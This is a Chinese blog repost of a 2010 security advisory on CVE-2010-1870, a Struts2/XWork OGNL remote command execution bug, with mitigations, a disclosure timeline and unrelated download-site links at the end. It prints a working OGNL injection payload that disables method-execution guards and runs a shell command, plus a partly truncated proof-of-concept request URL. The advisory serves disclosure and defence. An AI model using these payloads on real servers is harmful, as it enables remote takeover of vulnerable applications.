备忘下,TMD delicious现在都搞定老不爽了 。。。
CVE-2010-1870: Struts2/XWork remote command execution |
Update Tue Jul 13 2010: Added proof of concept |
Apache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed. |
Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns: |
user.address.city=Bishkek&user['favoriteDrink']=kumys |
action.getUser().getAddress().setCity("Bishkek") |
action.getUser().setFavoriteDrink("kumys") |
This is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments. |
NOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml). |
In addition to property getting/setting, OGNL supports many more features: |
* Static method calling: @java.lang.System@exit(1)
|
* Constructor calling: new MyClass()
|
* Ability to work with context variables: #foo = new MyClass()
|
Since HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution: |
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)
|
* SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)
|
To make it easier for developer to access various frequently needed objects XWork provides several predefined context variables: |
These variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further. |
Earlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more: |
* #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value.
|
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.
|
You can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code: |
#_memberAccess['allowStaticMethodAccess'] = true |
#foo = new java .lang.Boolean("false") |
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo |
#rt = @java.lang.Runtime@getRuntime() |
#rt.exec('mkdir /tmp/PWNED') |
Actual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1): |
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den |
yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti |
Struts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability. |
In cases where upgrade isn't possible you can use ParameterInterceptor's "excludeParams" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'"[]) alternatively you can blacklist \()@ which are the characters required to exploit this bug. |
May 31st - email to security@struts.apache.org with vulnerability report. |
June 4th - no response received, contacted developers again. |
June 5th - had to find an XWork developer on IRC to look at this. |
June 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix. |
June 20th - 1-line fix commited |
June 29th - Struts 2.2.0 release voting process started and is still going... |
分享到:
相关推荐
论坛系统(Struts 2+Hibernate+Spring实现)<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE validators SYSTEM ...
struts2 之xwork源码 供学习Struts2和Xwork的朋友使用
struts2_xwork2下载 http://struts.apache.org/2.0.14/index.html http://www.opensymphony.com/xwork/download.action
Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档
struts2下的Xwork2源文件 在 opensymphony开源社区http://www.opensymphony.com/ 可匿名使用SVN checkout xwork2的源代码 http://svn.opensymphony.com/svn/xwork/trunk
Struts2中xwork源码,希望对你们有所帮助。
<filter-name>struts2</filter-name> <filter-class> org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter </filter-class> </filter> <filter-mapping> <filter-name>struts2</filter-...
Struts2 2.3.16xwork_doc 自己制作的xwork,如有错漏请见谅
struts2-xwork-ognl的源文件(jar包),在eclipse中导入就可以直接在eclipse中查看对应的源代码,(注:现在下载的struts2的开发包已不自带此文件)免费的啊
最新版本的Struts2.2.3 以及Xwork的帮助文档
Struts2中xwork的源代码,学习Struts2的朋友一定要看看
struts2+xwork的源代码调试项目,包含简单的demo项目。次项目可直接导入eclispe、部署在服务器上要加入servlet-api.jar包的支持,此项目为研究源代码者提供,这也是个人好长时间自己探索出来的,希望大家努力。...
包含Struts2和Xwork的核心API,字体适中,方便阅读,chm格式,方便查询
最全的struts2.3和xwork2.chm中文帮助文档
struts2下的xwork源码 学习源代码,掌握struts2原理
这个压缩包包含struts-xwork-core的src源码,导入eclipse即可。
struts2.2.1,xwork源码,一边看源码,一边看书,效果更好
1、升级所需要的jar(见附件): freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar ...<struts>“加在这里”</struts>
Struts作为MVC 2的Web框架,自推出以来不断受到开发者的追捧,得到用广泛的应用。作为最成功的Web框架,Struts自然拥有众多的优点: MVC 2模型的使用 功能齐全的标志库(Tag Library) 开放源代码 好了...